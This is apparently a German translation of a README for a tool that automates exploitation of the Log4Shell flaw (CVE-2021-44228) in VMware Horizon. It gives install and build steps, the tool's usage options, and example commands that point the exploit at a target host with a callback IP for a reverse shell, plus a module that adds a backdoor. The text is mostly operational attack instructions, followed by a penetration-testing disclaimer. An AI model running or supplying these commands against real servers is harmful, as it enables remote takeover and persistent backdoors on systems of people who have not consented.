
Ausnutzung von CVE-2021-44228 in VMWare Horizon für Remote-Codeausführung und mehr.
Ausnutzung von CVE-2021-44228 in VMWare Horizon für Remote-Code-Ausführung und mehr.
Code und README.md sind dieses Mal etwas verstreut. Updates folgen!
Proof-of-Concept-Exploits für diese Schwachstelle sind verstreut und müssen manuell durchgeführt werden. Dieses Repository automatisiert den Exploit-Prozess. Siehe den Blogbeitrag oben für Anleitungen zur Post-Exploitation.
Dieses Repository kann manuell oder mit Docker verwendet werden.
Um den Exploit manuell herunterzuladen und auszuführen, führen Sie die folgenden Schritte aus. Stellen Sie zunächst sicher, dass Java und Maven auf Ihrem Angreifer-Host installiert sind. Führen Sie dazu auf Debian-basierten Betriebssystemen den folgenden Befehl mit apt aus:
apt update && apt install openjdk-11-jre maven
Klonen Sie das GitHub-Repository und installieren Sie alle Python-Anforderungen:
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
&& cd Log4jHorizon && pip3 install -r requirements.txt
Kompilieren Sie vom Stammverzeichnis des Log4jHorizon-Repositorys das Rogue-Jndi-Projekt mit dem folgenden Befehl:
mvn package -f utils/rogue-jndi/
Stellen Sie zunächst sicher, dass Docker auf Ihrem Angreifer-Host installiert ist. (Ich werde Sie nicht durch diesen Prozess führen)
Führen Sie anschließend den folgenden Befehl aus, um das Repository zu klonen und das Docker-Image zu erstellen, das wir verwenden werden.
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
&& cd Log4jHorizon && docker build -t Log4jHorizon .
Um den Container auszuführen, führen Sie einen Befehl ähnlich dem folgenden mit Ihren angehängten Befehlszeilenflags aus. Beachten Sie, dass der Container keine Reverse Shell abfängt. Sie müssen einen ncat-Listener in einer separaten Shell-Sitzung erstellen:
docker run -it -p 1389:1389 Log4jHorizon \
-r -t horizon.acme.com -i 192.168.1.1 -p 4444
usage: exploit.py [-h] -t URL -i CALLBACK [-p PORT] [-r] [-b]
optional arguments:
-h, --help show this help message and exit
-t URL, --target URL VMWare Horizon IP
-i CALLBACK, --ip CALLBACK
Callback IP for payload delivery and reverse shell.
-p PORT, --port PORT Callback port for reverse shell.
-r, --revshell Module to establish reverse shell using node.exe.
-b, --backdoor Module to add backdoor.
Erhalten Sie eine Reverse Shell mit dem auf Ihrem lokalen System installierten Tool:
python3 exploit.py -r -t horizon.acme.com -p 442 -i 192.168.1.1
Dieses Tool ist für den Einsatz während Penetrationstests konzipiert; die Verwendung dieses Tools zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal. Es liegt in der Verantwortung des Endbenutzers, alle geltenden lokalen, staatlichen und bundesstaatlichen Gesetze einzuhalten. Die Entwickler übernehmen keine Haftung und sind nicht für jeglichen Missbrauch dieses Programms verantwortlich.